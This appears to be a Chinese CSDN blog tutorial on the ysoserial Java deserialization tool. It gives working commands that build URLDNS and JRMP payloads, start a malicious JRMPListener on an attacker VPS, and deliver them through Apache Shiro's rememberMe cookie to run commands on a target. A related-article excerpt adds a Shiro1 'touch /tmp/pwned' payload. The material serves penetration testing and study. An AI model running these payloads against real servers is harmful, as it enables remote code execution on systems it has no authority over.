Java反序列化工具ysoserial使用

最新推荐文章于 2024-05-22 11:24:20 发布
最新推荐文章于 2024-05-22 11:24:20 发布
阅读量4.3k 收藏 36
点赞数 32
文章标签: java 渗透测试 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/st3pby/article/details/135111050
版权

ysoserial是一款用于生成 利用不安全的Java对象反序列化 的有效负载的概念验证工具。

项目地址

https://github.com/frohoff/ysoserial

主要有两种使用方式,一种是运行ysoserial.jar 中的主类函数,另一种是运行ysoserial中的exploit 类,二者的效果是不一样的,一般用第二种方式开启交互服务。

使用方式一

官方介绍中的基本用法:

java -jar ysoserial.jar [payload] '[command]'

这种是运行ysoserial中的主类函数:

#发起dnslog请求的payload
java -jar ysoserial.jar URLDNS http://xxx.dnslog.cn/
java -jar ysoserial.jar URLDNS http://xxx.dnslog.cn/ > /tmp/urldns.ser

#连接1.1.1.1:19999JRMP服务的payload
java -jar ysoserial.jar JRMPClient "1.1.1.1:19999"  > /tmp/jrmp.ser
使用方式二

最常见用法,即运行ysoserial中的exploit类,一般用于开启交互服务:

exploit类有哪些可以在ysoserial-all\ysoserial\exploit目录下看到

image-20231220152716095

#1099端口启动一个JRMP监听,等待连接 , 然后执行 cc1链 whoami
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'whoami'

这里再提一下,java命令的-cp参数和-classpath参数是一样的,即指定类运行所依赖类路径、通常是类库和jar包。而java命令的-jar参数则直接执行jar包里面META-INF\MANIFEST.MF文件中指定的Main-Class。

JRMP

JRMP(Java Remote Method Protocol)是Java远程方法调用协议的缩写。它是Java中用于实现分布式对象通信的一种协议。

在Java中,可以通过远程方法调用(Remote Method Invocation,RMI)来实现不同Java虚拟机(JVM)之间的通信。JRMP是RMI中的默认协议,它定义了在Java平台上进行远程方法调用所使用的协议规范。

JRMP允许在不同的JVM之间进行对象的远程调用,使得分布式系统中的Java对象可以通过网络进行交互。通过JRMP,客户端可以调用远程服务器上的方法,就像调用本地对象的方法一样。JRMP负责处理网络通信、对象序列化和反序列化等细节,以实现透明的远程方法调用。

要使用JRMP进行远程方法调用,需要定义接口、实现远程对象、绑定远程对象到特定的端口,并在客户端和服务器端分别设置相应的配置。

方式一的实例

使用 ysoserial,生成一个 URLDNS 序列化 payload:

java -jar ysoserial.jar URLDNS http://urldns.m2pxdwq5pbhubx9p6043sg8wqnwdk2.burpcollaborator.net > /tmp/urldns.ser

img

用 shiro 编码脚本将序列化 payload 进行编码,得到 Cookie 字符串:

java -jar shiro-exp.jar encrypt /tmp/urldns.ser

img

再将上面得到的 Cookie 字符串作为 rememberMe Cookie 的值,发送到目标网站,如果 cipher key 正确,则目标会成功反序列化我们发送的 payload,Burp Collaborator client 将收到 dns 解析记录,说明目标网站存在 shiro 反序列化漏洞:

img

方式二的实例

攻击者先在公网 vps 上用 ysoserial 启一个恶意的 JRMPListener,监听在 19999 端口,并指定使用 CommonsCollections6 模块,要让目标执行的命令为 ping 一个域名:

java -cp ysoserial.jar ysoserial.expeseloit.JRMPListener 19999 CommonsCollections6 "ping cc6.m2pxdwq5pbhubx9p6043sg8wqnwdk2.burpcollaborator.net"

然后用 ysoserial 生成 JRMPClient 的序列化 payload,指向上一步监听的地址和端口(假如攻击者服务器 ip 地址为 1.1.1.1):

java -jar ysoserial.jar JRMPClient "1.1.1.1:19999" > /tmp/jrmp.ser

再用 shiro 编码脚本对 JRMPClient payload 进行编码:

java -jar shiro-exp.jar encrypt /tmp/jrmp.ser

将最后得到的字符串 Cookie 作为 rememberMe Cookie 的值,发送到目标网站。如果利用成功,则前面指定的 ping 命令会在目标服务器上执行,Burp Collaborator client 也将收到 DNS 解析记录。

st3pby
关注
  • 32
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
午夜安全
05-31 1727
作者介绍:ysoserial是一款用于生成利用不安全Java对象反序列化的有效负载的概念验证工具ysoserial其实就是工具,集合了各种java反序列化的payload,利用它可以方便的测试反序列化漏洞。
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3295
ysoserial这款工具,堪称为“java反序列利用神器”。
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
ysoserial下载和使用
最新发布
c0529的博客
05-22 293
因为要用java打开jar格式的,所以如果下的是源文件,还需要打包,我试了试,我这个报错了,我也不知道哪里有问题。如果不报错可以自己试试打包的工作,说不定以后还有用到。所以我的建议是直接下载jar版本的。然后直接用java去运行就可以了。网址拖到下面就可以直接下载。
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8706
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
反序列化工具ysoserial使用介绍
qq_34778376的博客
02-23 6456
反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload; 下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'
java序列化理解_对ysoserial工具java反序列化的一个阶段性理解
weixin_39615808的博客
02-24 286
经过一段时间的琢磨与反思,以及重读了大量之前看不懂的反序列化文章,目前为止算是对java反序列化这块有了一个阶段性的小理解。目前为止,发送的所有java反序列化的漏洞中。主要需要两个触发条件:1、反序列化的攻击入口2、反序列化的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以反序列化。其实这块是有一定的误导性的。在我最初研究反序列化的时候,我觉得攻击链...
【转载】ysoserial反序列化工具打包jar文件流程
mingyqf的博客
03-30 1806
ysoserial反序列化工具打包jar文件流程 [Fighter安全团队](javascript:void(0)😉 2021-01-31 22:28 00 — *前言* 身边很多朋友都不懂怎么将源码项目打包成jar文件,那么接着上一篇的环境就简单讲讲jar的打包流程,毕竟在github上有些项目都不是打包好的。这里以ysoserial为例,项目下载地址:https://codeload.github.com/frohoff/ysoserial/zip/master 01 — *idea打包jar * 导入
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 1797
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
ysoserial反序列工具
04-19
ysoserial反序列工具包,个人觉得还是很好利用 Java rmi 基本还很顺手
ysoserial,用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。.zip
10-13
用于生成利用不安全Java对象反序列化的有效负载的概念验证工具
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
ysoserial:一种概念验证工具,用于生成利用不安全Java对象反序列化的有效负载
02-03
约瑟 概念证明工具,用于生成利用不安全Java对象反序列化的有效负载。 描述 最初作为AppSecCali 2015讲座一部分发布,其中包含Apache Commons Collections(3.x和4.x),Spring Beans / Core(4.x)和Groovy( 2.3.x)。 后来进行了更新,以包括和其他几个库的其他小工具链。 ysoserial是在通用Java库中发现的实用程序和面向属性的编程“小工具链”的集合,这些工具库可以在适当的条件下利用Java应用程序对对象执行不安全反序列化。 主驱动程序接受用户指定的命令,并将其包装在用户指定的小工具链中,然后将这些对象序列
java反序列化利用程序UI版Beta1.1.zip
11-24
java反序列化利用程序UI版Beta1.1
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
109-Java反序列化ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
shiro反序列化工具
05-23
Shiro反序列化漏洞利用工具有很多,比如ysoserial、Java反序列化工具、ShiroSploit等。其中ysoserial是最常用的,它是一个Java反序列化工具,可以生成各种类型的Java反序列化payload,包括针对Shiro的payload。使用ysoserial生成Shiro反序列化payload的步骤如下: 1. 下载ysoserial工具:https://github.com/frohoff/ysoserial 2. 构造payload,使用以下命令生成一个包含恶意代码的序列化数据: ``` java -jar ysoserial.jar Shiro1 "touch /tmp/pwned" > shiro-payload.bin ``` 这个命令将生成一个包含`touch /tmp/pwned`命令的序列化数据,并将其输出到名为`shiro-payload.bin`的文件中。 3. 将生成的payload发送给目标服务器,触发Shiro反序列化漏洞,执行恶意代码。 需要注意的是,Shiro反序列化漏洞利用不是一件容易的事情,攻击者需要对目标系统进行深入的了解和分析,才能构造出有效的payload。同时,使用这种工具进行攻击是违法行为,请勿尝试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值